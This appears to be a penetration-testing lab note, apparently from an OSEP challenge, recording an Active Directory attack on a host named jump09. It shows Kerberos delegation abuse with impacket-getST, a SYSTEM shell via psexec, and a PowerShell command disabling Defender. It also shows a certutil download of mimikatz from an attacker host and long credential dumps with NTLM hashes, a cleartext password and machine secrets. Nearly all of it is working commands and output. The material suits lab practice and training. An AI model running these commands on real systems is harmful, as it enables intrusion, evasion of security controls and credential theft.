参考:https://wadcoms.github.io/wadcoms/Impacket-getST-Creds/
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **impacket-getST -spn CIFS/jump09.ops.comply.com -impersonate Administrator -ts ops.comply.com/crack:'Passw0rd!' -dc-ip 172.16.64.165**
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[2022-08-01 04:41:07] [-] CCache file is not found. Skipping...
[2022-08-01 04:41:07] [*] Getting TGT for user
[2022-08-01 04:41:08] [*] Impersonating Administrator
[2022-08-01 04:41:08] [*] Requesting S4U2self
[2022-08-01 04:41:08] [*] Requesting S4U2Proxy
[2022-08-01 04:41:09] [*] Saving ticket in Administrator.ccache
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **export KRB5CCNAME=/home/kali/Documents/osep/Challenge/5/Administrator.ccache**
**┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ impacket-psexec -k -no-pass [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] [Errno Connection error (jump09.ops.comply.com:445)] [Errno -2] Name or service not known
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ ping jump09.ops.comply.com 1 ⨯
ping: jump09.ops.comply.com: Name or service not known**
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ subl /etc/hosts 2 ⨯
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ impacket-psexec -k -no-pass [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on jump09.ops.comply.com.....
[*] Found writable share ADMIN$
[*] Uploading file zEAJTFce.exe
[*] Opening SVCManager on jump09.ops.comply.com.....
[*] Creating service PdyT on jump09.ops.comply.com.....
[*] Starting service PdyT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>
为了正常使用psexec
,需要在/etc/hosts
增加记录:(开启sshuttle
)
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
**172.16.64.167 jump09.ops.comply.com**
C:\\Windows\\system32> whoami
nt authority\\system
C:\\Windows\\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
504 {0;000003e7} 1 D 34460 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 2586959 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 2618637 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::secrets
Domain : JUMP09
SysKey : d00cb0d5c3db1c86c8fef7b6d42c3850
Local name : JUMP09 ( S-1-5-21-551967267-3520917720-162912151 )
Domain name : OPS ( S-1-5-21-2032401531-514583578-4118054891 )
Domain FQDN : ops.comply.com
Policy subsystem is : 1.18
LSA Key(s) : 1, default {ab7d1860-a13f-c032-390f-c35f59094ba3}
[00] {ab7d1860-a13f-c032-390f-c35f59094ba3} dc34bdce13e61c7cea7a11ed793ac340083ffb7f00ec96bf6e82d1caf70f95cf
Secret : $MACHINE.ACC
cur/hex : 35 f4 37 10 1b 1a c0 63 d2 73 95 7f d2 6c e5 66 e4 c7 65 e5 f3 34 95 a6 ba 0c f1 f6 14 50 2d e2 de 64 08 3a 74 79 da ad bd 27 26 1e 8d f7 92 30 03 36 af 21 5c 5a f0 d1 90 14 7e e0 f5 0b a1 b5 84 37 46 02 b4 33 0a 92 57 9c ab 53 d4 43 a2 34 d2 98 6c 13 4d 25 cc 82 f6 29 e0 0c 20 d4 e4 ef 57 87 44 d7 ca 4d af d8 dc a2 87 fa a2 6a 4e 66 74 e8 8a 87 ce e1 d8 b9 2f fb c2 c8 05 14 ed 7c c6 95 70 9f e0 67 d1 a2 4a 0c 18 b4 b5 8c c6 0b cc 0f 78 29 a5 55 43 01 46 6f ce 12 06 c1 1d ae af a4 9e e8 8a 8b 0c fe d4 6e 75 f4 4d 0c 14 aa 53 0b 95 b4 bd 90 3f c6 84 3c 0a 3e c1 2c 19 39 67 bf 46 b6 ed aa 4f 63 58 ec b2 bd e3 5d a5 23 c0 a0 4b 5d 3c e8 47 bd b1 30 04 44 39 2f 59 77 6b 35 42 58 0c c9 db aa e5 cb b8 3a 25 f5 2d f0
NTLM:771b56c4474779b7be40b451946e603b
SHA1:959e66ad042bff250123ac06f1584ccd17202c92
old/hex : a4 0f 22 47 de 29 60 1f f9 2c 36 e4 63 7e 3a c3 15 f9 7c f5 43 34 4f b0 92 04 6b d0 b7 dc f4 b1 ad e1 1c af fa 09 21 fe 30 36 e1 6e c6 ab dc d9 82 51 8f 4f a4 54 34 20 63 fd 84 b1 26 ee b6 79 e9 c9 83 08 c7 a0 f5 07 c5 17 97 8c 34 06 31 67 43 3b 10 5f b9 9d 7e 34 81 83 23 39 ee 15 be 6b e7 d8 34 c4 42 68 fa 46 33 f5 03 33 f9 96 3a 1a 2e da 65 36 3a a0 7a f2 83 29 2a ad 2d 84 29 30 e8 5f a2 27 3b 30 34 a2 81 64 26 08 9b 59 e0 8e 15 df e5 fe 93 0f cb ae f7 fd 44 75 16 db e0 5e 2e ab 77 0d ef b9 ec 6b fa 7d b8 06 da 2d d9 bb 77 08 33 e0 d0 1b ca 84 cb df 56 fb 59 02 6f 76 3a 09 18 83 ed 0c cc 7f 5b 5f d1 bd c4 17 3a 1f 25 47 f9 fe 58 c5 85 90 0e b3 5b eb b7 a0 18 33 5a df c5 13 37 74 a8 65 cf f4 3d 54 31 51 cd ee
NTLM:28dda6f07b9ba6a4961e3597a2af43c1
SHA1:fe4ae03763b170778b0e7264e25df7c6d864a674
Secret : DefaultPassword
cur/text: 0998ASDaas2
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 86 cc 6b 70 24 dd d6 e6 a0 03 cd 87 06 2d 2d 5e d2 b6 a8 b0 36 50 c4 85 1b 0f 23 4c 0e 77 fa da 4a f7 ee f8 11 cf 8a f5
full: 86cc6b7024ddd6e6a003cd87062d2d5ed2b6a8b03650c4851b0f234c0e77fada4af7eef811cf8af5
m/u : 86cc6b7024ddd6e6a003cd87062d2d5ed2b6a8b0 / 3650c4851b0f234c0e77fada4af7eef811cf8af5
old/hex : 01 00 00 00 97 a6 3f 54 b1 c9 bc 3e 15 bc 06 38 93 2a cc d9 75 ca 08 ff b0 bf f8 f8 2e 07 8b 8e fb fc 71 d8 46 1b bc 08 bb 45 95 51
full: 97a63f54b1c9bc3e15bc0638932accd975ca08ffb0bff8f82e078b8efbfc71d8461bbc08bb459551
m/u : 97a63f54b1c9bc3e15bc0638932accd975ca08ff / b0bff8f82e078b8efbfc71d8461bbc08bb459551
Secret : NL$KM
cur/hex : 7d 36 72 4c ef cd 9d 6d f8 78 24 51 55 b4 24 f2 ac dc fe 74 a6 16 46 1f 96 f1 ee 4f 73 02 b2 25 a5 b3 0b 32 41 7f 66 2c dd e7 f8 ea b3 a7 f5 6a 92 dd c5 96 2f 41 14 4c 7e 4f e2 b7 d5 30 24 82
old/hex : 7d 36 72 4c ef cd 9d 6d f8 78 24 51 55 b4 24 f2 ac dc fe 74 a6 16 46 1f 96 f1 ee 4f 73 02 b2 25 a5 b3 0b 32 41 7f 66 2c dd e7 f8 ea b3 a7 f5 6a 92 dd c5 96 2f 41 14 4c 7e 4f e2 b7 d5 30 24 82
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop> mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::lsa /patch
Domain : JUMP09 / S-1-5-21-551967267-3520917720-162912151
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 1e4dbd55348c6fd346b92b2f825b3f1e
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : bb6f2140dc46d70e48da58b788d2a758
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop> mimikatz.exe "sekurlsa::logonPasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 729678 (00000000:000b224e)
Session : Interactive from 0
User Name : Administrator
Domain : JUMP09
Logon Server : JUMP09
Logon Time : 3/21/2022 6:15:19 AM
SID : S-1-5-21-551967267-3520917720-162912151-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : JUMP09
* NTLM : 1e4dbd55348c6fd346b92b2f825b3f1e
* SHA1 : a53ea9e05e6f703102eb5537fb8d6a4f962bc4a6
tspkg :
wdigest :
* Username : Administrator
* Domain : JUMP09
* Password : (null)
kerberos :
* Username : Administrator
* Domain : JUMP09
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 360877 (00000000:000581ad)
Session : Interactive from 1
User Name : pete
Domain : OPS
Logon Server : CDC07
Logon Time : 3/21/2022 6:13:34 AM
SID : S-1-5-21-2032401531-514583578-4118054891-1104
msv :
[00000003] Primary
* Username : pete
* Domain : OPS
* NTLM : 6db6cfdf45964a02a80e85a7ab9f4314
* SHA1 : b05116328c39096171239d396ed1fa9039c61ebf
* DPAPI : 955dffd3d4998aaf4217c7a675ec0391
tspkg :
wdigest :
* Username : pete
* Domain : OPS
* Password : (null)
kerberos :
* Username : pete
* Domain : OPS.COMPLY.COM
* Password : 0998ASDaas2
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : JUMP09$
Domain : OPS
Logon Server : (null)
Logon Time : 3/21/2022 6:13:08 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : JUMP09$
* Domain : OPS
* NTLM : 771b56c4474779b7be40b451946e603b
* SHA1 : 959e66ad042bff250123ac06f1584ccd17202c92
tspkg :
wdigest :
* Username : JUMP09$
* Domain : OPS
* Password : (null)
kerberos :
* Username : jump09$
* Domain : OPS.COMPLY.COM
* Password : 35 f4 37 10 1b 1a c0 63 d2 73 95 7f d2 6c e5 66 e4 c7 65 e5 f3 34 95 a6 ba 0c f1 f6 14 50 2d e2 de 64 08 3a 74 79 da ad bd 27 26 1e 8d f7 92 30 03 36 af 21 5c 5a f0 d1 90 14 7e e0 f5 0b a1 b5 84 37 46 02 b4 33 0a 92 57 9c ab 53 d4 43 a2 34 d2 98 6c 13 4d 25 cc 82 f6 29 e0 0c 20 d4 e4 ef 57 87 44 d7 ca 4d af d8 dc a2 87 fa a2 6a 4e 66 74 e8 8a 87 ce e1 d8 b9 2f fb c2 c8 05 14 ed 7c c6 95 70 9f e0 67 d1 a2 4a 0c 18 b4 b5 8c c6 0b cc 0f 78 29 a5 55 43 01 46 6f ce 12 06 c1 1d ae af a4 9e e8 8a 8b 0c fe d4 6e 75 f4 4d 0c 14 aa 53 0b 95 b4 bd 90 3f c6 84 3c 0a 3e c1 2c 19 39 67 bf 46 b6 ed aa 4f 63 58 ec b2 bd e3 5d a5 23 c0 a0 4b 5d 3c e8 47 bd b1 30 04 44 39 2f 59 77 6b 35 42 58 0c c9 db aa e5 cb b8 3a 25 f5 2d f0
ssp :
credman :
Authentication Id : 0 ; 40392 (00000000:00009dc8)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 3/21/2022 6:13:07 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : JUMP09$
* Domain : OPS
* NTLM : 771b56c4474779b7be40b451946e603b
* SHA1 : 959e66ad042bff250123ac06f1584ccd17202c92
tspkg :
wdigest :
* Username : JUMP09$
* Domain : OPS
* Password : (null)
kerberos :
* Username : JUMP09$
* Domain : ops.comply.com
* Password : 35 f4 37 10 1b 1a c0 63 d2 73 95 7f d2 6c e5 66 e4 c7 65 e5 f3 34 95 a6 ba 0c f1 f6 14 50 2d e2 de 64 08 3a 74 79 da ad bd 27 26 1e 8d f7 92 30 03 36 af 21 5c 5a f0 d1 90 14 7e e0 f5 0b a1 b5 84 37 46 02 b4 33 0a 92 57 9c ab 53 d4 43 a2 34 d2 98 6c 13 4d 25 cc 82 f6 29 e0 0c 20 d4 e4 ef 57 87 44 d7 ca 4d af d8 dc a2 87 fa a2 6a 4e 66 74 e8 8a 87 ce e1 d8 b9 2f fb c2 c8 05 14 ed 7c c6 95 70 9f e0 67 d1 a2 4a 0c 18 b4 b5 8c c6 0b cc 0f 78 29 a5 55 43 01 46 6f ce 12 06 c1 1d ae af a4 9e e8 8a 8b 0c fe d4 6e 75 f4 4d 0c 14 aa 53 0b 95 b4 bd 90 3f c6 84 3c 0a 3e c1 2c 19 39 67 bf 46 b6 ed aa 4f 63 58 ec b2 bd e3 5d a5 23 c0 a0 4b 5d 3c e8 47 bd b1 30 04 44 39 2f 59 77 6b 35 42 58 0c c9 db aa e5 cb b8 3a 25 f5 2d f0
ssp :
credman :
Authentication Id : 0 ; 39115 (00000000:000098cb)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 3/21/2022 6:13:07 AM
SID :
msv :
[00000003] Primary
* Username : JUMP09$
* Domain : OPS
* NTLM : 771b56c4474779b7be40b451946e603b
* SHA1 : 959e66ad042bff250123ac06f1584ccd17202c92
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 865959 (00000000:000d36a7)
Session : Interactive from 0
User Name : Administrator
Domain : JUMP09
Logon Server : JUMP09
Logon Time : 8/1/2022 12:53:37 AM
SID : S-1-5-21-551967267-3520917720-162912151-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : JUMP09
* NTLM : 1e4dbd55348c6fd346b92b2f825b3f1e
* SHA1 : a53ea9e05e6f703102eb5537fb8d6a4f962bc4a6
tspkg :
wdigest :
* Username : Administrator
* Domain : JUMP09
* Password : (null)
kerberos :
* Username : Administrator
* Domain : JUMP09
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 360762 (00000000:0005813a)
Session : Interactive from 1
User Name : pete
Domain : OPS
Logon Server : CDC07
Logon Time : 3/21/2022 6:13:34 AM
SID : S-1-5-21-2032401531-514583578-4118054891-1104
msv :
[00000003] Primary
* Username : pete
* Domain : OPS
* NTLM : 6db6cfdf45964a02a80e85a7ab9f4314
* SHA1 : b05116328c39096171239d396ed1fa9039c61ebf
* DPAPI : 955dffd3d4998aaf4217c7a675ec0391
tspkg :
wdigest :
* Username : pete
* Domain : OPS
* Password : (null)
kerberos :
* Username : pete
* Domain : OPS.COMPLY.COM
* Password : 0998ASDaas2
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 3/21/2022 6:13:08 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 70004 (00000000:00011174)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/21/2022 6:13:08 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : JUMP09$
* Domain : OPS
* NTLM : 28dda6f07b9ba6a4961e3597a2af43c1
* SHA1 : fe4ae03763b170778b0e7264e25df7c6d864a674
tspkg :
wdigest :
* Username : JUMP09$
* Domain : OPS
* Password : (null)
kerberos :
* Username : JUMP09$
* Domain : ops.comply.com
* Password : a4 0f 22 47 de 29 60 1f f9 2c 36 e4 63 7e 3a c3 15 f9 7c f5 43 34 4f b0 92 04 6b d0 b7 dc f4 b1 ad e1 1c af fa 09 21 fe 30 36 e1 6e c6 ab dc d9 82 51 8f 4f a4 54 34 20 63 fd 84 b1 26 ee b6 79 e9 c9 83 08 c7 a0 f5 07 c5 17 97 8c 34 06 31 67 43 3b 10 5f b9 9d 7e 34 81 83 23 39 ee 15 be 6b e7 d8 34 c4 42 68 fa 46 33 f5 03 33 f9 96 3a 1a 2e da 65 36 3a a0 7a f2 83 29 2a ad 2d 84 29 30 e8 5f a2 27 3b 30 34 a2 81 64 26 08 9b 59 e0 8e 15 df e5 fe 93 0f cb ae f7 fd 44 75 16 db e0 5e 2e ab 77 0d ef b9 ec 6b fa 7d b8 06 da 2d d9 bb 77 08 33 e0 d0 1b ca 84 cb df 56 fb 59 02 6f 76 3a 09 18 83 ed 0c cc 7f 5b 5f d1 bd c4 17 3a 1f 25 47 f9 fe 58 c5 85 90 0e b3 5b eb b7 a0 18 33 5a df c5 13 37 74 a8 65 cf f4 3d 54 31 51 cd ee
ssp :
credman :
Authentication Id : 0 ; 69984 (00000000:00011160)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/21/2022 6:13:08 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : JUMP09$
* Domain : OPS
* NTLM : 771b56c4474779b7be40b451946e603b
* SHA1 : 959e66ad042bff250123ac06f1584ccd17202c92
tspkg :
wdigest :
* Username : JUMP09$
* Domain : OPS
* Password : (null)
kerberos :
* Username : JUMP09$
* Domain : ops.comply.com
* Password : 35 f4 37 10 1b 1a c0 63 d2 73 95 7f d2 6c e5 66 e4 c7 65 e5 f3 34 95 a6 ba 0c f1 f6 14 50 2d e2 de 64 08 3a 74 79 da ad bd 27 26 1e 8d f7 92 30 03 36 af 21 5c 5a f0 d1 90 14 7e e0 f5 0b a1 b5 84 37 46 02 b4 33 0a 92 57 9c ab 53 d4 43 a2 34 d2 98 6c 13 4d 25 cc 82 f6 29 e0 0c 20 d4 e4 ef 57 87 44 d7 ca 4d af d8 dc a2 87 fa a2 6a 4e 66 74 e8 8a 87 ce e1 d8 b9 2f fb c2 c8 05 14 ed 7c c6 95 70 9f e0 67 d1 a2 4a 0c 18 b4 b5 8c c6 0b cc 0f 78 29 a5 55 43 01 46 6f ce 12 06 c1 1d ae af a4 9e e8 8a 8b 0c fe d4 6e 75 f4 4d 0c 14 aa 53 0b 95 b4 bd 90 3f c6 84 3c 0a 3e c1 2c 19 39 67 bf 46 b6 ed aa 4f 63 58 ec b2 bd e3 5d a5 23 c0 a0 4b 5d 3c e8 47 bd b1 30 04 44 39 2f 59 77 6b 35 42 58 0c c9 db aa e5 cb b8 3a 25 f5 2d f0
ssp :
credman :
Authentication Id : 0 ; 40345 (00000000:00009d99)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 3/21/2022 6:13:07 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : JUMP09$
* Domain : OPS
* NTLM : 771b56c4474779b7be40b451946e603b
* SHA1 : 959e66ad042bff250123ac06f1584ccd17202c92
tspkg :
wdigest :
* Username : JUMP09$
* Domain : OPS
* Password : (null)
kerberos :
* Username : JUMP09$
* Domain : ops.comply.com
* Password : 35 f4 37 10 1b 1a c0 63 d2 73 95 7f d2 6c e5 66 e4 c7 65 e5 f3 34 95 a6 ba 0c f1 f6 14 50 2d e2 de 64 08 3a 74 79 da ad bd 27 26 1e 8d f7 92 30 03 36 af 21 5c 5a f0 d1 90 14 7e e0 f5 0b a1 b5 84 37 46 02 b4 33 0a 92 57 9c ab 53 d4 43 a2 34 d2 98 6c 13 4d 25 cc 82 f6 29 e0 0c 20 d4 e4 ef 57 87 44 d7 ca 4d af d8 dc a2 87 fa a2 6a 4e 66 74 e8 8a 87 ce e1 d8 b9 2f fb c2 c8 05 14 ed 7c c6 95 70 9f e0 67 d1 a2 4a 0c 18 b4 b5 8c c6 0b cc 0f 78 29 a5 55 43 01 46 6f ce 12 06 c1 1d ae af a4 9e e8 8a 8b 0c fe d4 6e 75 f4 4d 0c 14 aa 53 0b 95 b4 bd 90 3f c6 84 3c 0a 3e c1 2c 19 39 67 bf 46 b6 ed aa 4f 63 58 ec b2 bd e3 5d a5 23 c0 a0 4b 5d 3c e8 47 bd b1 30 04 44 39 2f 59 77 6b 35 42 58 0c c9 db aa e5 cb b8 3a 25 f5 2d f0
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : JUMP09$
Domain : OPS
Logon Server : (null)
Logon Time : 3/21/2022 6:13:07 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : JUMP09$
* Domain : OPS
* Password : (null)
kerberos :
* Username : jump09$
* Domain : OPS.COMPLY.COM
* Password : 35 f4 37 10 1b 1a c0 63 d2 73 95 7f d2 6c e5 66 e4 c7 65 e5 f3 34 95 a6 ba 0c f1 f6 14 50 2d e2 de 64 08 3a 74 79 da ad bd 27 26 1e 8d f7 92 30 03 36 af 21 5c 5a f0 d1 90 14 7e e0 f5 0b a1 b5 84 37 46 02 b4 33 0a 92 57 9c ab 53 d4 43 a2 34 d2 98 6c 13 4d 25 cc 82 f6 29 e0 0c 20 d4 e4 ef 57 87 44 d7 ca 4d af d8 dc a2 87 fa a2 6a 4e 66 74 e8 8a 87 ce e1 d8 b9 2f fb c2 c8 05 14 ed 7c c6 95 70 9f e0 67 d1 a2 4a 0c 18 b4 b5 8c c6 0b cc 0f 78 29 a5 55 43 01 46 6f ce 12 06 c1 1d ae af a4 9e e8 8a 8b 0c fe d4 6e 75 f4 4d 0c 14 aa 53 0b 95 b4 bd 90 3f c6 84 3c 0a 3e c1 2c 19 39 67 bf 46 b6 ed aa 4f 63 58 ec b2 bd e3 5d a5 23 c0 a0 4b 5d 3c e8 47 bd b1 30 04 44 39 2f 59 77 6b 35 42 58 0c c9 db aa e5 cb b8 3a 25 f5 2d f0
ssp :
credman :
mimikatz(commandline) # exit
Bye!